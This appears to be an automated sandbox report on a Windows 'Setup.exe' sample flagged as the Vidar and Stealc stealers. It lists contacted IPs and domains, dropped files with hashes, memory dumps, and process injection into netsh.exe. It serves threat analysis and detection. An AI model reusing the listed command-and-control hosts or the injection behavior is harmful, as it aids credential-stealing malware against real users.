DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
DE 162.55.53.18:9000 162.55.53.18 tcp
FI 135.181.22.88:80 135.181.22.88 tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp
US 45.152.112.146:80 proresupdate.com tcp
US 104.21.76.173:443 contur2fa.recipeupdates.rest tcp
US 104.21.76.173:443 contur2fa.recipeupdates.rest tcp
FI 65.109.127.181:3333 tcp
FI 65.109.127.181:3333 tcp

Files

memory/1652-0-0x0000000074C50000-0x0000000074DCD000-memory.dmp

memory/1652-1-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

memory/1652-8-0x0000000074C50000-0x0000000074DCD000-memory.dmp

memory/1652-7-0x0000000074C62000-0x0000000074C64000-memory.dmp

memory/1652-9-0x0000000074C50000-0x0000000074DCD000-memory.dmp

memory/408-11-0x0000000074C51000-0x0000000074C5F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7c4bcf43

MD5 77ab4dae781342a5e5946789d00d4c6a
SHA1 d7c64e20b3ce078fc1094205ed5df08f42e540a8
SHA256 7da5a06dcaac6adebd6b8eff57e06c8f846f458e78b634f21d2ca741e9e46c36
SHA512 e675b45c07d1539598b45e4b879ecef47a8d97dfef4843d5b66ab537a14b2b24bf832f83d098e3bf65851b9f48287dc022ad1c405401d3dabef8701b4f9846cf

memory/408-13-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

memory/408-16-0x0000000074C5E000-0x0000000074C60000-memory.dmp

memory/408-17-0x0000000074C51000-0x0000000074C5F000-memory.dmp

memory/408-20-0x0000000074C51000-0x0000000074C5F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dcom.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/704-22-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

memory/704-23-0x0000000000B80000-0x00000000012CC000-memory.dmp

memory/704-26-0x0000000061E00000-0x0000000061EF3000-memory.dmp

C:\ProgramData\CAKFIJDHJEGI\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\ProgramData\CAKFIJDHJEGI\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/704-100-0x0000000000B80000-0x00000000012CC000-memory.dmp

C:\ProgramData\BAKKEGCAAE.exe

MD5 6cfddd5ce9ca4bb209bd5d8c2cd80025
SHA1 424da82e9edbb6b39a979ab97d84239a1d67c48b
SHA256 376e1802b979514ba0e9c73933a8c6a09dd3f1d2a289f420c2202e64503d08a7
SHA512 d861130d87bfedc38a97019cba17724067f397e6ffe7e1384175db48c0a177a2e7e256c3c933d0f42766e8077f767d6d4dc8758200852e8ec135736daee7c0f8

memory/2584-114-0x0000000000D50000-0x0000000001263000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8308c106

MD5 8d443e7cb87cacf0f589ce55599e008f
SHA1 c7ff0475a3978271e0a8417ac4a826089c083772
SHA256 e2aaaa1a0431aab1616e2b612e9b68448107e6ce71333f9c0ec1763023b72b2a
SHA512 c7d0ced6eb9e203d481d1dbdd5965278620c10cdc81c02da9c4f7f99f3f8c61dfe975cf48d4b93ccde9857edb881a77ebe9cd13ae7ef029285d770d767aa74a5

memory/2584-120-0x0000000072970000-0x0000000072AED000-memory.dmp

memory/2584-121-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

C:\ProgramData\BKKJKFBKKE.exe

MD5 daaff76b0baf0a1f9cec253560c5db20
SHA1 0311cf0eeb4beddd2c69c6e97462595313a41e78
SHA256 5706c6f5421a6a34fdcb67e9c9e71283c8fc1c33499904519cbdc6a21e6b071c
SHA512 987ca2d67903c65ee1075c4a5250c85840aea26647b1d95a3e73a26dcad053bd4c31df4ca01d6cc0c196fa7e8e84ab63ed4a537f72fc0b1ee4ba09cdb549ddf3

memory/3368-132-0x0000000000520000-0x0000000000768000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\877bb061

MD5 c62f812e250409fbd3c78141984270f2
SHA1 9c7c70bb78aa0de4ccf0c2b5d87b37c8a40bd806
SHA256 d8617477c800cc10f9b52e90b885117a27266831fb5033647b6b6bd6025380a8
SHA512 7573ecac1725f395bbb1661f743d8ee6b029f357d3ef07d0d96ee4ff3548fe06fab105ee72be3e3964d2053de2f44245cca9a061d47c1411949840c84f6e9092

memory/3368-138-0x0000000072970000-0x0000000072AED000-memory.dmp

memory/3368-139-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

C:\ProgramData\CAKFIJDHJEGI\EHJDHJ

MD5 59071590099d21dd439896592338bf95
SHA1 6a521e1d2a632c26e53b83d2cc4b0edecfc1e68c
SHA256 07854d2fef297a06ba81685e660c332de36d5d18d546927d30daad6d7fda1541
SHA512 eedb6cadbceb2c991fc6f68dccb80463b3f660c5358acd7d705398ae2e3df2b4327f0f6c6746486848bd2992b379776483a98063ae96edb45877bb0314874668

memory/704-174-0x0000000000B80000-0x00000000012CC000-memory.dmp

memory/704-175-0x0000000000B80000-0x00000000012CC000-memory.dmp

C:\ProgramData\CAKFIJDHJEGI\EBGCGH

MD5 bed7fc66d3b015a77ecbb8a825c3eb1b
SHA1 324662d03b11e4a649a7458aa57a40f250f5fc18
SHA256 6778e40c106193ba06e541b347f1afa36bdd64bcbcce1547e3db1aecbfa5f854
SHA512 c42313248dd9d07acb4eaf2592cfb855f7f0d7208d779c4e44e9d5946117639bb4713ab21b0e84e20eba81d8d0546b5d0e628a737d31a12632bc0254d79e4534

memory/704-186-0x0000000000B80000-0x00000000012CC000-memory.dmp

memory/2584-187-0x0000000072970000-0x0000000072AED000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\84f7268b

MD5 65003d377eca75f9351a39e45d69f234
SHA1 33c501b08925dceb4027c14fa3c1a0a6351b75a8
SHA256 c8a6fc14e70e5f09bd5a8b1559fde1b95c9aa4694b1d5e2835d778a610b70f70
SHA512 f579f5a1845f1400a6554df0311785723783988339ca483407fa329b243a2bd40da7de7563c83cdea5ba1cbe4616e50d28740ca6749f2c202e52059363fb334f

memory/3368-190-0x0000000072970000-0x0000000072AED000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8998412e

MD5 52ad7bef358ade6bc07f6c87d999bd5e
SHA1 a9fe6380c91db9faa4fc4370b42908ad21551d4b
SHA256 93c5852dc277f3865e055325449f4abae2441618cb3a859a2f851453d5e9f847
SHA512 2fa46b2ee1d36c66aebcaaa8bccda63ad215602d5f10abb18a035fff517dbf13ff5a8148d11996ee577cf6576638be6957e0ac0a292d9cfe994604cb81fd9032

memory/1580-193-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

memory/1728-194-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

C:\ProgramData\CAKFIJDHJEGI\VCRUNT~1.DLL

MD5 a37ee36b536409056a86f50e67777dd7
SHA1 1cafa159292aa736fc595fc04e16325b27cd6750
SHA256 8934aaeb65b6e6d253dfe72dea5d65856bd871e989d5d3a2a35edfe867bb4825
SHA512 3a7c260646315cf8c01f44b2ec60974017496bd0d80dd055c7e43b707cadba2d63aab5e0efd435670aa77886ed86368390d42c4017fc433c3c4b9d1c47d0f356

C:\ProgramData\CAKFIJDHJEGI\softokn3.dll

MD5 4e52d739c324db8225bd9ab2695f262f
SHA1 71c3da43dc5a0d2a1941e874a6d015a071783889
SHA256 74ebbac956e519e16923abdc5ab8912098a4f64e38ddcb2eae23969f306afe5a
SHA512 2d4168a69082a9192b9248f7331bd806c260478ff817567df54f997d7c3c7d640776131355401e4bdb9744e246c36d658cb24b18de67d8f23f10066e5fe445f6

C:\ProgramData\CAKFIJDHJEGI\msvcp140.dll

MD5 5ff1fca37c466d6723ec67be93b51442
SHA1 34cc4e158092083b13d67d6d2bc9e57b798a303b
SHA256 5136a49a682ac8d7f1ce71b211de8688fce42ed57210af087a8e2dbc8a934062
SHA512 4802ef62630c521d83a1d333969593fb00c9b38f82b4d07f70fbd21f495fea9b3f67676064573d2c71c42bc6f701992989742213501b16087bb6110e337c7546

memory/1580-200-0x0000000072970000-0x0000000072AED000-memory.dmp

memory/1580-210-0x0000000072970000-0x0000000072AED000-memory.dmp

memory/4528-214-0x00007FF8C61E0000-0x00007FF8C7880000-memory.dmp

memory/4528-217-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3616-218-0x00007FF8E7C00000-0x00007FF8E7E09000-memory.dmp

memory/2168-222-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-224-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-226-0x00000219EBFC0000-0x00000219EBFE0000-memory.dmp

memory/2168-225-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-227-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-230-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-229-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-228-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/2168-231-0x0000000140000000-0x00000001407DC000-memory.dmp

memory/3616-232-0x0000000000380000-0x00000000003F1000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 fde517015fe00ce619a68e316a67cb5d
SHA1 9ec8bf6078f520af08de3ccee6e814d49ee8b2a4
SHA256 fa3c6e1c629924ae0ec043c17966413ff5ead455e764806babea0860408cf731
SHA512 fcc343ab3771011a97e94360ccc6a6782e9afded72c429bf517694f613e8a19418656d650e76d1f75f4bd6e0820c7f480a09583172cc4b64d64e2ee936d3570d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 019e53c242fe603d78d0780c4c7205ee
SHA1 7dc37b1e39567daa7e30f4927f917a9399913eac
SHA256 ca8d8c57354df6c562d65f64f8b77cc60b23a086dc728df3ba216d583b71fbc2
SHA512 8ad9ebd431c08e2dcb3679f53daa475380b08a8f7e93049a8e1a2193b5470e38ab9cc7f27ad328791ce75f316b37cc39d55fe401a3fecb05b937e5b51320f636

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8390b77e8f2216f046f042c509b68228
SHA1 a079b53e03a23e1d19fecd41d9f980a05ba706bb
SHA256 fa05f7c1ecf6b53c66694bea11433cf8615fc058a88b635b592a9c8b05da973c
SHA512 45a8ae8d68329cab404f33edbf017e610e64e06d3bb111e7634c34ac8850141401d1c6fc44f79b19bb9abf095955a835c57d56523f1d43e88420648e4d32b603

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\Local\Temp\1000003041\run.ps1

MD5 1e49c49df1e9bb5a3646fbdd72fff72d
SHA1 ca3b2f92797030ad96341c5551812e679e9746d3
SHA256 df52ed4a147cad99aec03614368f8781e806c45be6e046ec4a73a26e7ec9cd10
SHA512 b0c96599de30f1822ddc99d1fed6341ae06f25a171c52b9a78f6304d02a30f8da41738d4af4b4c8365b0b52739b3df03be99dddf764f12f724bd24a91b59c82d

memory/3172-246-0x0000000002FD0000-0x0000000003006000-memory.dmp

memory/3172-247-0x0000000005AA0000-0x00000000060CA000-memory.dmp

memory/3172-248-0x0000000005930000-0x0000000005952000-memory.dmp

memory/3172-249-0x0000000006240000-0x00000000062A6000-memory.dmp

memory/3172-250-0x00000000062B0000-0x0000000006316000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pvf2dhmx.ylk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3172-259-0x0000000006400000-0x0000000006757000-memory.dmp

memory/3172-260-0x00000000067D0000-0x00000000067EE000-memory.dmp

memory/3172-261-0x0000000006820000-0x000000000686C000-memory.dmp

memory/3172-264-0x0000000007A30000-0x0000000007AC6000-memory.dmp

memory/3172-265-0x0000000006D10000-0x0000000006D2A000-memory.dmp

memory/3172-266-0x0000000006DA0000-0x0000000006DC2000-memory.dmp

memory/3172-267-0x0000000008080000-0x0000000008626000-memory.dmp

memory/3172-268-0x0000000008CB0000-0x000000000932A000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-17 17:40

Reported

2024-06-17 17:43

Platform

win7-20240611-en

Max time kernel

120s

Max time network

124s

Command Line

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

Signatures

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

Vidar

stealer vidar

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2580 set thread context of 1964 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2580 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2580 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2580 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2580 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 2580 wrote to memory of 1964 N/A C:\Users\Admin\AppData\Local\Temp\files\Setup.exe C:\Windows\SysWOW64\netsh.exe
PID 1964 wrote to memory of 2764 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1964 wrote to memory of 2764 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1964 wrote to memory of 2764 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1964 wrote to memory of 2764 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1964 wrote to memory of 2764 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 1964 wrote to memory of 2764 N/A C:\Windows\SysWOW64\netsh.exe C:\Users\Admin\AppData\Local\Temp\dcom.au3
PID 2764 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2764 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2764 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe
PID 2764 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\dcom.au3 C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\files\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\files\Setup.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\SysWOW64\netsh.exe

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Users\Admin\AppData\Local\Temp\dcom.au3

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2764 -s 148

Network

N/A

Files

memory/2580-0-0x00000000743A0000-0x0000000074514000-memory.dmp

memory/2580-1-0x0000000077040000-0x00000000771E9000-memory.dmp

memory/2580-7-0x00000000743B2000-0x00000000743B4000-memory.dmp

memory/2580-8-0x00000000743A0000-0x0000000074514000-memory.dmp

memory/2580-9-0x00000000743A0000-0x0000000074514000-memory.dmp

memory/1964-11-0x00000000743A0000-0x0000000074514000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1baacc4c

MD5 d821207af26672d1cb2f002ce762f31c
SHA1 12f85154ab78708436a7c53ad8a531f6de287a97
SHA256 ba65519d929fac172cfa2434ec5dabbb974c159bd6be6ef5bf7e9bf23bd799a1
SHA512 adfb0f065fb2e3563c77c5385dee5398b0fe8a611972cac51d24cb152deae89f865447b0b31f4dbdecdc0a7ef49b55de180579ebcb254cd8aa7b7a5379362e2b

memory/1964-13-0x0000000077040000-0x00000000771E9000-memory.dmp

memory/1964-15-0x00000000743A0000-0x0000000074514000-memory.dmp

memory/1964-18-0x00000000743A0000-0x0000000074514000-memory.dmp

\Users\Admin\AppData\Local\Temp\dcom.au3

MD5 c56b5f0201a3b3de53e561fe76912bfd
SHA1 2a4062e10a5de813f5688221dbeb3f3ff33eb417
SHA256 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
SHA512 195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

memory/2764-22-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2764-21-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/1964-23-0x00000000743A0000-0x0000000074514000-memory.dmp

memory/2764-25-0x0000000000AE0000-0x000000000122C000-memory.dmp

memory/2764-34-0x0000000000AE0000-0x000000000122C000-memory.dmp